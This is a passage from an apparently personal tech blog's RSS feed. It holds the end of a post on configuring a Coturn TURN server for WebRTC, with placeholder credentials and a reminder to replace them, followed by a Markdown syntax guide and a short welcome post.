<p>In your WebRTC application, configure the ICE servers like this:</p>
<pre><code class="language-javascript">const iceServers = [
  {
    urls: &quot;stun:stun.l.google.com:19302&quot;,
  },
  {
    // Plain TURN on 3478; use the turns: scheme for TLS on 5349
    urls: [&quot;turn:your-domain.com:3478&quot;, &quot;turns:your-domain.com:5349&quot;],
    username: &quot;turnuser&quot;,
    credential: &quot;securepassword123&quot;,
  },
];

const peerConnection = new RTCPeerConnection({ iceServers });
</code></pre>
<h2>Conclusion</h2>
<p>Setting up a TURN server ensures your WebRTC applications work reliably across all network configurations. Coturn is a robust, open-source solution that handles the complexities of NAT traversal for you.</p>
<p>Remember to replace all placeholder values with your actual domain, IPs, and secure passwords before deploying to production!</p>]]></content:encoded>
      <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>turn-server</category>
      <category>webrtc</category>
      <category>coturn</category>
      <category>stun</category>
      <category>nat-traversal</category>
    </item>
<item>
      <title><![CDATA[Markdown Syntax Guide]]></title>
      <link>https://blog.niheshr.com/markdown-syntax-guide</link>
      <guid isPermaLink="true">https://blog.niheshr.com/markdown-syntax-guide</guid>
      <description><![CDATA[A comprehensive guide to Markdown syntax with examples.]]></description>
      <content:encoded><![CDATA[<p>This post demonstrates various <strong>Markdown</strong> features.</p>
<h2>Text Formatting</h2>
<h3>How to Write</h3>
<pre><code class="language-markdown">- **Bold text** using double asterisks
- _Italic text_ using underscores
- **_Bold and italic_** combining bold and italic
- ~~Strikethrough~~ using double tildes
</code></pre>
<h3>Result</h3>
<ul>
<li><strong>Bold text</strong> using double asterisks</li>
<li><em>Italic text</em> using underscores</li>
<li><strong><em>Bold and italic</em></strong> combining bold and italic</li>
<li><del>Strikethrough</del> using double tildes</li>
</ul>
<h2>Lists</h2>
<h3>Unordered Lists</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">- Item 1
- Item 2
  - Nested item 2.1
  - Nested item 2.2
- Item 3
</code></pre>
<h4>Result</h4>
<ul>
<li>Item 1</li>
<li>Item 2<ul>
<li>Nested item 2.1</li>
<li>Nested item 2.2</li>
</ul>
</li>
<li>Item 3</li>
</ul>
<h3>Ordered Lists</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">1. First item
2. Second item
3. Third item
</code></pre>
<h4>Result</h4>
<ol>
<li>First item</li>
<li>Second item</li>
<li>Third item</li>
</ol>
<h2>Code Blocks</h2>
<h3>Inline Code</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">Use `console.log()` for debugging.
</code></pre>
<h4>Result</h4>
<p>Use <code>console.log()</code> for debugging.</p>
<h3>JavaScript</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">```javascript
const greeting = &quot;Hello, World!&quot;;
console.log(greeting);
```
</code></pre>
<h4>Result</h4>
<pre><code class="language-javascript">const greeting = &quot;Hello, World!&quot;;
console.log(greeting);
</code></pre>
<h3>Python</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">```python
def hello_world():
    print(&quot;Hello, World!&quot;)
```
</code></pre>
<h4>Result</h4>
<pre><code class="language-python">def hello_world():
    print(&quot;Hello, World!&quot;)
</code></pre>
<h3>Bash</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">```bash
echo &quot;Hello, World!&quot;
ls -la
cd /home/user
```
</code></pre>
<h4>Result</h4>
<pre><code class="language-bash">echo &quot;Hello, World!&quot;
ls -la
cd /home/user
</code></pre>
<h2>Quotes</h2>
<h3>How to Write</h3>
<pre><code class="language-markdown">&gt; This is a blockquote.
&gt; It can span multiple lines.
</code></pre>
<h3>Result</h3>
<blockquote>
<p>This is a blockquote.
It can span multiple lines.</p>
</blockquote>
<h2>Links</h2>
<h3>How to Write</h3>
<pre><code class="language-markdown">[Visit Next.js](https://nextjs.org)
</code></pre>
<h3>Result</h3>
<p><a href="https://nextjs.org">Visit Next.js</a></p>
<h2>Summary</h2>
<p>Markdown is a <em>simple</em> yet <strong>powerful</strong> markup language!</p>]]></content:encoded>
      <pubDate>Sat, 03 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>markdown</category>
      <category>guide</category>
      <category>formatting</category>
    </item>
<item>
      <title><![CDATA[Welcome to My Blog]]></title>
      <link>https://blog.niheshr.com/welcome-to-my-blog</link>
      <guid isPermaLink="true">https://blog.niheshr.com/welcome-to-my-blog</guid>
      <description><![CDATA[This is the first post on my new blog. Welcome!]]></description>
      <content:encoded><![CDATA[<p>Welcome to my <strong>first blog post</strong> 👋</p>
<p>This blog is a space where I’ll share my thoughts, experiences, and things I learn along the way while working with technology.</p>
<h2>What You’ll Find Here</h2>
<ul>
<li>Technical writing on web development and software engineering</li>
<li>Personal perspectives on technology and learning</li>
<li>Occasional experiments, ideas, and reflections</li>
</ul>
<p>Thanks for being here.
Stay tuned for more content! 👻</p>]]></content:encoded>
      <pubDate>Thu, 01 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>introduction</category>
      <category>welcome</category>
    </item>
  </channel>
</rss>